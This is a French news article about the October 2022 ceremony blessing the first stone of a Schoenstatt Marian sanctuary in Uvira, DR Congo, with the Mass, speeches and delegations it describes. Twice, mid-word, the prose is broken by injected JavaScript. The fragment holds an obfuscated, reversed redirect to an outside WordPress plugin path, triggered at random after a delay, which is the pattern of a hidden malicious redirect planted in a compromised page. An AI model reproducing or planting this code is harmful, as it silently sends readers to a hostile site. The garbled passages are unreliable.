C’est en 1994 que le Sanctuaire Mont Sion Gikungu, Oasis de paix et de réconciliation, a vu le jour au Burundi sous l’initiative des Pères de Schoenstatt. Vingt-huit ans après, un autre Sanctuaire marial desdits Pères est sur le point de voir le jour et cette fois-ci en République démocratique du Congo dans la cité d’Uvira, dans le Sud-Kivu, frontalière avec la ville de Bujumbura.
C’est dans cette optique que ce jeudi, 27 octobre 2022, a eu lieu, dans cette partie du pays voisin, les cérémonies de la pose et la bénédiction de la première pierre en vue de la construction du tout premier sanctuaire marial de schoenstatt en République Démocratique du Congo, plus précisément au Mont Sion Bula.
Lesdites cérémonies ont débuté par la célébration Eucharistique à 10h passées présidée par le Vicaire Général du Diocèse d’Uvira, qui, pour la circonstance, représentait l’Ordinaire du lieu, en déplacement.
Dans son homélie, le célébrant a invité les schoenstattiens présents à bien persévérer dans la prière pour l’accomplissement de cette œuvre belle qui commence, pour que la très sainte Vierge Marie y prenne toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domicile pour le bien de l’Eglise-famille en général et du Diocèse d’Uvira en particulier. Ce faisant, juste après le rite conclusif de la Messe, fut alors bénie la première pierre marquant le début d’un long processus de construction dudit Sanctuaire.
Dans son discours de circonstance, le Père Herménégilde Coyitungiye, Isch ; Père Supérieur délégué de la communauté des Pères de schoenstatt dans la région des Grands lacs, a appelé à un effort mutuel de Prière, de sacrifices tant moral que matériel pour venir à bout à ce projet. La contribution de chacun, à son niveau et selon ses moyens, est vivement souhaitée, a poursuivi le Père COYITUNGIYE. Il a ensuite présenté les différentes images qui seront présentes dans le sanctuaire, à titre d’exemple l’icône de la Vierge Marie bénie par sa Sainteté, le Pape François, à Rome le 01 septembre 2022. Il a terminé par la lecture de la lettre du Supérieur Général des Pères de schoenstatt, envoyée pour l’occasion. Le Père Alexandre Awi Mello, Isch, a demandé à travers celle-ci à tous les schoenstattiens de la République Démocratique du Congo d’avoir foi en Dieu et de ne cesser jamais de vénérer la Vierge Marie. Soyez confiant au bon vouloir du Père céleste qui veut transformer ce lieu en un lieu de grâce et des bénédictions malgré une apparence simple et négligée comme celui-ci a a bien déjà eu des précédents dans l’histoire du monde et surtout de l’Eglise.
Ont aussi pris la parole pour exprimer leur joie : le représentant du chef de quartier, celui du Mwami, le Coortoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnateur diocésain de Schoenstatt à Uvira, sans oublier le Père Jean Marie Bisimwa, Isch, Curé de la Paroisse Bon Pasteur de Kalundu où tous les invités ont été conviés pour un rafraîchissement à la fin de la cérémonie. Signalons aussi la présence à cette cérémonie des différentes délégations venues d’ailleurs notamment de Kinshasa, de Goma, de Bukavu et de Bujumbura.
Qu’il plaise à Dieu d’accompagner cette œuvre belle pour la plus grande gloire et le salut monde.
RIEN SANS VOUS, RIEN SANS NOUS!
Gaetan